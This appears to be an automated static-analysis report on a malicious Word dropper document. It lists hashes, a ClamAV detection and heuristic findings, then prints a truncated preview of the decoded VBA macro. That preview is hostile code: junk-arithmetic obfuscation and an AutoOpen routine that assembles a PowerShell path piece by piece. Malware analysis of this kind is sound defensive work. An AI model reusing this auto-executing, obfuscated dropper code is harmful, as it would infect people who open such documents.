Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 16f5c2aa5b6014e0…

MALICIOUS

Office (OLE)

Size: 476.0 KB
Created: 2018-10-09 10:08:00
Authoring application: Microsoft Office Word
First seen: 2018-12-09
MD5: 6f7dcf0dc05bff4ca4b781010c64f00f
SHA-1: 2f11db85d61d1ae05026e78e572338f964c37083
SHA-256: 16f5c2aa5b6014e0861aae59e051a817511ae273b58e184c3b9be7ec6d2676ae
Risk score: 230

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

ClamAV identifies the sample as a malicious dropper. High-severity heuristics indicate an AutoOpen VBA macro that uses CreateObject, a common pattern for downloading and executing a secondary payload. The obfuscated VBA code does not reveal specific download URLs or execution commands, but the overall behaviour points to dropper functionality.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-7079664-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7079664-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro, which runs automatically when the document is opened
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    Macro code calls CreateObject
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
    Macro code calls Environ() to read environment variables
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 230293 bytes
SHA-256: dd92b0fe259aee500a469ae188979875d1ac8c801094f996364afd40fdd2eee6

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function plostvy()
ytqaozbnca0 = -108 * 161
eutwriye90 = -151 + 180
End Function
Function yeouq()
ycxmbxflrcy = -170 * 9
End Function
Function wcmht5(uyxs)
ygsciu = -130 - 143
End Function
Function aielny(sqdgebhm, cdazsg)
dzlacfmxlxkc = -136 + 36
dkacdraee = -100 / 112
yafiavid = -126 * 85
eyeavco = -162 / 160
End Function
Function krsdua()
Dim afhbtzxfuvcf As Integer
afhbtzxfuvcf = -63 * 166
oioa = -148 / 11
End Function
Function ofglggj()
ilvgkelm03 = -169 / 127
End Function
Function imzxhjqi41(ccnhkiy)
ouebx80 = -83 * 65
apzqs = -135 / 15
hsnwyel = -54 + 1
End Function
Function yihl(eaeeu, jkziejy)
jfipfmp55 = -134 + 29
End Function
Function qeayfr()
nmdzak = -155 / 158
lxeyu = -114 * 83
cwsompwtvyq = -35 - 19
End Function
Function fwfnfdek()
Dim zriyimzp As Integer
zriyimzp = -4 + 5
vlohjfe = -82 * 15
End Function
Function sqaikfj(njdiix91)
okaymaa = -115 / 27
End Function
Function unyynt(yoxcfx6)
iivcoekpue = -75 - 29
yeruyzo = -179 - 44
End Function
Function hknizjuu6()
qrsnvmzoqcea = -121 / 125
yavugjeu4 = -170 - 126
End Function
Function nwumxw7(irih)
euoj3 = -6 / 13
sfiaidxi = -141 / 88
ywvuaaoi = -33 * 146
End Function
Function usjhpxcqb(oocgyoxx)
Dim xfqcebug As Integer
xfqcebug = -148 - 131
weuze = -111 / 42
End Function
Function uojrby()
wmolzfhusg = -111 * 17
uaym = -27 + 17
End Function
Function upcobu(ayfu, zoriqrt)
ayye8 = -79 + 9
End Function
Function naoiojc8(rgzhdqxi, ybaap22)
naleutt = -116 + 56
edzzdaiqni2 = -173 - 151
trpzqs = -94 + 19
flxeuasq = -20 - 51
End Function
Function jqlmdqqwo(ivmdlrpi)
uquqreuqn = -137 * 8
mweyecshmsj = -18 + 106
edgfsoa = -80 + 10
dakicwwl = -174 - 174
End Function
Function ijfmlxfgq(bkaiwdv, tfyieza)
hmwyucsjot = -178 * 174
End Function
Sub AutoOpen()
mmsiyu = "+$ioolydgfhhcoeba"
ogiabkei = -12 - 138
ipdaikliqz = -26 / 164
jqyblmufs = -39 - 122
rgstbe = "qk98+$l"
uyyyxjiy = -136 / 114
akvwjouwn = -159 / 27
pgayyay = "bjhoy"
obueibx = -70 - 149
hqyipqietr = -163 / 95
xmdkbsid = Environ("SystemRoot")
uyusger = -93 + 140
hcikay = -88 + 66
khawtgqxtqa = -13 * 122
caqgom = xmdkbsid
nkptknlww = -38 / 97
evqeay3 = -93 * 62
plivteyo60 = -118 * 166
caqgom = caqgom + "\syst"
cjuqxgyxqu2 = -65 - 106
iulne = -45 * 180
eoer = -144 / 98
efow82 = -61 * 24
vuaxv0 = "iyeski"
ripllm = -62 * 62
uphou = -93 + 19
kdosmuswl52 = "iyay95+$udntvys"
Dim zgaleyfce As String
zgaleyfce = -34 / 163
yvef = -173 * 87
oeea = -46 * 94
eieeo = "dpintoeoye27"
alwwarkybpk = -82 * 125
maeuyknrznh = -167 / 174
grckjxxesc09 = -80 / 147
yuafj = "+$ukhkizuyufvvm"
Dim uyiqkfsb6 As Integer
uyiqkfsb6 = -115 / 147
amdmiekjkxf = -47 + 25
Dim rtveuiyqtu9 As Integer
rtveuiyqtu9 = -100 + 160
uteoieysg = -45 - 78
ymcuoot = "htoete+"
hcuooijc = -170 * 145
qslxsbp = -104 / 70
qaiyujyr84 = -154 / 31
jblxsjmnpje = -156 * 60
yakceuwt = "$nn"
Dim euyytw7 As Integer
euyytw7 = -61 * 3
suqvs = "em32"
fsebcpqbrr97 = -110 + 176
pgjriayarq = -88 / 64
caqgom = caqgom + suqvs
Dim iijqkjvxkshf As String
iijqkjvxkshf = -64 - 74
ickia = -87 + 89
cqfxkkjz = caqgom
ckutds = -122 + 151
bwezjqb = -125 - 179
oaiia = -21 - 73
uukxorme = "\Wi"
vzboint15 = -2 / 44
royiyobj = -78 * 15
uasxnui = -179 / 143
byawxzsthn = -2 * 57
cqfxkkjz = cqfxkkjz + uukxorme
bepvroo = -58 * 17
fuou = -21 - 167
ynmfjwi96 = -124 * 107
ejsueqo = -81 * 174
yhnhpio = -161 * 1
niur6 = -18 / 173
jvdpwmoinng = cqfxkkjz
nenfyyrpey = -151 - 2
jvdpwmoinng = jvdpwmoinng + "nd"
htqi = -38 / 28
vuowvffiwk = -4 - 92
eouyslpzo0 = -144 / 88
oiauiaujv = -31 * 148
evyjsttz = -26 - 64
oubgf = -85 * 154
yity00 = -141 / 60
ygfry6 = -2 / 47
oawvymbasq = -27 - 110
yaouon = mmsiyu & rgstbe & pgayyay & vuax
... (truncated)